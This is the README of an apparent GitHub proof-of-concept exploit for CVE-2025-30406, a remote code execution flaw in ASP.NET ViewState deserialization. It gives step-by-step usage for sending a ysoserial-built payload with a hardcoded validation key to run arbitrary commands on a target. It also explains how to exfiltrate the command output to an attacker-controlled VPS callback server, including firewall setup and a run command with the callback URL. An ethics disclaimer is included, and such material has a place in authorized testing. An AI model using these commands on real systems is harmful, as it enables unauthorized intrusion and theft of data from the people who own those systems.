JrExploit/CVE-2025-30406
CVE-2025-30406 ViewState Exploit PoC

Overview

This is a Proof-of-Concept (PoC) script demonstrating a ViewState deserialization exploit for CVE-2025-30406 in ASP.NET applications. It uses ysoserial to generate a malicious ViewState payload and sends it to a user-specified URL to execute a provided command. For best results, command output can be exfiltrated to a custom HTTP server (server.py) running on a VPS, which displays results in a styled format with timestamps, green prompts, and white output text. This script is intended for educational purposes only and must only be used on systems where you have explicit permission to perform security testing. Unauthorized use is illegal and unethical.

CVE Details

  • CVE ID: CVE-2025-30406
  • Description: A deserialization vulnerability in ASP.NET ViewState handling that allows remote code execution when a valid validation key and generator are known.
  • Affected Systems: ASP.NET applications with vulnerable ViewState configurations.
  • Prerequisites for Exploitation:
    • Access to a valid ViewState validation key and generator.
    • A vulnerable endpoint accepting ViewState parameters.

Repository Contents

  • exploit.py: The main PoC script to generate and send the ViewState payload.
  • server.py: An HTTP server to receive and display exfiltrated command output in a styled format.
  • README.md: This file, with setup and usage instructions.

Prerequisites

  • Python 3.x
  • requests library (pip install requests)
  • ysoserial executable (Windows or equivalent for your platform)
  • A vulnerable ASP.NET application endpoint
  • A VPS or server to run server.py (recommended for exfiltration)
  • Permission to test the target system

Installation

  1. Clone this repository:
    git clone https://github.com/yourusername/cve-2025-30406-poc.git
    cd cve-2025-30406-poc
  2. Install the required Python package:
    pip install requests
  3. Download ysoserial and place it in the same directory as exploit.py, or pass its path with the -y flag.

Setup on a VPS (Recommended)

To receive exfiltrated command output in a styled format, run server.py on a VPS:

  1. Copy server.py to your VPS (e.g., via scp):
    scp server.py user@your-vps-ip:/home/user/
  2. Ensure Python 3 is installed:
    sudo apt update && sudo apt install python3 python3-pip
  3. Run the server (default port 8000):
    python3 server.py
  4. Ensure the VPS firewall allows inbound traffic on port 8000:
    sudo ufw allow 8000
  5. Note the VPS’s public IP or domain (e.g., http://your-vps-ip:8000) for use with the -e flag in exploit.py.

Usage

Running the Exploit

Run exploit.py with the required arguments. The -e flag is optional but highly recommended for exfiltrating command output to server.py for styled display.

python exploit.py -u <target_url> -c <command> [-y <ysoserial_path>] [-e <callback_url>]

Arguments

  • -u, --url: Target URL (e.g., http://target.com/page.aspx) [Required]
  • -c, --command: Command to execute (e.g., whoami) [Required]
  • -y, --ysoserial: Path to ysoserial executable (default: ./ysoserial.exe) [Optional]
  • -e, --exfil: Callback URL for exfiltrating command output (e.g., http://your-vps:8000) [Optional]

Examples

  1. Run without exfiltration (Blind execution):
    python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe
  2. Run with exfiltration to a VPS running server.py (recommended):
    python exploit.py -u http://example.com/loginpage.aspx -c "whoami" -y ./ysoserial.exe -e http://your-vps:8000

Running the Server

On your VPS or local machine, start the HTTP server to receive exfiltrated output:

python3 server.py

The server will display command output with timestamps, a green $ prompt, and white text for readability.

How It Works

  1. Exploit Script (exploit.py):
    • Uses ysoserial with a hardcoded validation key and generator to create a ViewState payload.
    • If -e is provided, the command is wrapped to capture output and send it to the callback URL via Invoke-WebRequest.
    • Sends the payload to the target URL in a POST request, embedded in the __VIEWSTATE parameter.
    • Prints the server’s response status and a portion of the response body.
  2. HTTP Server (server.py):
    • Listens for GET requests containing command output.
    • Decodes the URL path and splits it into lines.
    • Prints each line with a timestamp, green $ prompt, and white output text.
    • Responds with HTTP 200 and “OK”.

Ethical Use Warning

  • This script is a proof-of-concept for CVE-2025-30406 for educational and authorized security testing purposes.
  • Do not use this script on systems without explicit permission from the system owner.
  • Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
  • Always obtain written consent before testing any system.
  • Report vulnerabilities responsibly through coordinated disclosure or bug bounty programs.

Limitations

  • The hardcoded validation key and generator may only work for specific vulnerable applications. Users may need application-specific values.
  • The exploit targets ASP.NET applications vulnerable to ViewState deserialization.
  • The script assumes the target server processes the ViewState payload correctly.
  • Cross-platform compatibility depends on ysoserial availability (primarily Windows-based).
  • Exfiltration requires a publicly accessible server for the -e callback URL.

License

This project is licensed under the MIT License. See the LICENSE file for details.

Contact

For questions or feedback, please open an issue on this repository.
